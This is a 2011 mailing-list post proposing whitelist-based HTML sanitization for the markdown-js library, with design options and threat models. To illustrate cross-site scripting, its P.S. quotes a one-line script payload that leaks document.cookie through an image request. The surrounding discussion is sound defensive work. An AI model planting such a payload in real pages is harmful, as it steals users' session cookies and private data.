HTML sanitization

Kragen Javier Sitaker kragen+pairlist at
Fri Jul 29 11:59:22 EDT 2011


I'm going to add HTML sanitization to markdown-js, and I wanted to hear about
other people's experience with this. This mail is long, should take about five
minutes to read, but I'll be wasting a lot more time than five minutes if I go
down a dead-end rabbit hole on this. From my comments on [the issue on GitHub][]:

[the issue on GitHub]:
(issue 16 on markdown-js: "HTML support")

(I've bolded some phrases below to facilitate skimming; hope it's not too
annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm
thinking about how to do it. Is this a good way to do it? **I'd really
appreciate comments** before I go haring off without the benefit of other
people's advice and experience.

* JsonML doesn't have a spec written in English, as far as I can tell, just a
[BNF grammar][] and some example implementations in [XSLT][] and [JS with
the DOM][DOM]. As far as I can tell, both of the example implementations
unescape entity references on input and re-escape them on output, although
there's no English text to explain whether this is intentional or a bug.

I assert that **this is a bug**, because it robs JsonML of any way to
represent SGML entity references. I propose that JsonML strings should be
treated as PCDATA — allowed to contain entities but not tags — rather than
CDATA (plain text) or HTML (text with entities and tags).

[BNF grammar]: (The JSONML spec)

* Accordingly, when we *parse* a code block or inline code chunk, we should
escape `&` and `<` in it, and when we parse any other node, we should run
it through an HTML parser to break it down into subnodes, ensuring that
it's well-formed, modulo possible references to entities that we don't know
about. (I don't propose to include a list of all defined HTML entities
into markdown-js.) This means that in general we will **not escape HTML on
output**. It also means that the effect of poorly-nested input tags will
be limited to at most one parse-tree node.

* The HTML parser used as an input filter should be **configurable with
whitelists** of tags, attributes per tag, and URL schemes per attribute. By
default it should be configured with a fairly strict filter, blocking even
inline images and iframes with off-host URIs, and of course any possible
vector for JS. This will annoy people like cadorn, for whom such filtering
is unnecessary, and they need to have an easy way to turn off the
whitelists (if not the HTML parsing entirely). But I think that is better
than someone doing a `git pull` on markdown-js and getting privacy and XSS
problems added to their application. That is, **the default should be

I'm **hoping I can use an existing pure-JS HTML parser** — say, [jsdom][]'s, or
[kn_htmlsafe_htmlSanitize][], or [NodeHtmlParser][] — rather than hacking one
together from scratch. (As a fallback, I could write a very simple parser for
the tags-and-attributes subset of XHTML.) I'm a little worried about the
performance implications of this; markdown-js is already a little slower than
Showdown, and this could make the matter worse. Does **anybody have
recommendations here?**

(In the case where it's running in a modern browser, we could use `DOMParser`
as an optimization, but enough people are using markdown-js in Node that I
think it doesn't make sense to depend on that.)

(Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)
(Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer)
(A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

1. **Parse HTML on output**, not input, instead of building JsonML nodes in
the intermediate representation.

This has the disadvantage that it would make some kinds of processing on
the intermediate representation harder — for example, in [yamemex][], I
want to support Twitter-style #hashtags, and that will be easier to do if I
can tell which hash marks are in the text of the document and which are in
some URL somewhere. Also, any markup added by intermediate-representation
processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing
run faster and take less memory, and it expands the HTML parsers that can
be used beyond just those that build a parse tree, which is slow; HTML
parsers that simply produce sanitized HTML could be used. Also, the
intermediate representation would be simpler, since it wouldn't have HTML
tag names in it. This would involve changing the intermediate "JsonML"
representation to have HTML rather than CDATA or PCDATA contents — so `&`
would be represented as `&amp;` in the intermediate representation, not as
`&`, and `<b>` would mean `<b>`.

2. Leave the semantics of the intermediate representation unchanged aside from
adding more tag names, parsing HTML on input and **using an exhaustive
list of HTML entities** to convert things like `&copy;` &copy; and
`&ddagger;` &ddagger; to Unicode characters. I think this would be a hassle
to maintain. (Note that &ddagger; doesn't show up correctly here
[clarification: on GitHub] because GitHub has undertaken to maintain such a
list for their Markdown implementation — and failed. Visit the URL
`data:text/html,&ddagger;` to see that your browser supports it.)

3. Rather than parsing HTML on input or when rendering each node for output,
pass through HTML tags from input to output (except inside code blocks, of
course) and then run a final HTML-sanitizing pass on the output string to
ensure that it's well-formed and safe. This has the advantage of very
minimal coupling, and it would handle e.g. `<img
src="">` the same way regardless of whether it
was generated from `![ ](` or just included
literally in the source; the disadvantages are that it may be even slower
than the other alternatives (making an additional pass over markup whose
well-formedness and safety is guaranteed by construction), it could be a
little more bug-prone ("Where did all of my `<ol>`s go? Oh, I left `ol` out
of the whitelist."), and it doesn't facilitate intermediate processing in
any way.

(My project using markdown-js for, ultimately, social bookmarking.)

So, **what do other people think?** The above represents a few hours of me
thinking about the problem, but I anticipate that implementing it will take at
least a few days of work, so I'd really appreciate help in thinking this
through before I jump in.


P.S. I guess I should elaborate a little bit on the kinds of use cases/threat
models I'm thinking of here:

1. Using Markdown to write your own blog on your own domain, which is cadorn's
use case. There's little benefit to filtering your markup in this case; the
worst case is that your blog is formatted funny because you forgot to close
a `<blockquote>` or something. Unless you copy and paste a chunk of HTML
from somewhere else, which brings us to:

2. Using Markdown to render stuff pulled (manually or automatically) from
another [origin][]. The risk here is that the author of the stuff may have
included some code to take actions on your behalf and exfiltrate your
private information (known as "cross-site scripting"), either in a
straightforward way such as `<script>im=new Image();
im.src=""+document.cookie</script>` or some
more subtle way designed to evade naïve filters. Doing this reliably
requires that you use a whitelist rather than a blacklist so you don't end
up like the [stupid losers who built MySpace][Samy].

(As defined in the same-origin policy.)
(Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.)

Note that this category includes things like blogging software where
someone might plausibly copy and paste a piece of someone else's web page
in order to quote it.

3. Using Markdown to render stuff sent by a possible spammer or by someone else
who has an illegitimate interest in knowing whether you have read it — such
as email — in which case you do *not* want to confirm to the spammer that
you have read it. In this case want to filter out anything whose rendering
will generate network traffic (to anywhere other than the source of the
rendered document, that is), such as `<img src>` and `<iframe>`, as well as
all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with
it all the time. markdown-js is currently safe for this case because it escapes
all HTML, but I want it to let through safe HTML. I think that almost any
server-based web application that renders Markdown taken from client requests
is in category 2, if not category 3, and I think (though I don't know) that
many markdown-js applications do that.

More information about the Markdown-Discuss mailing list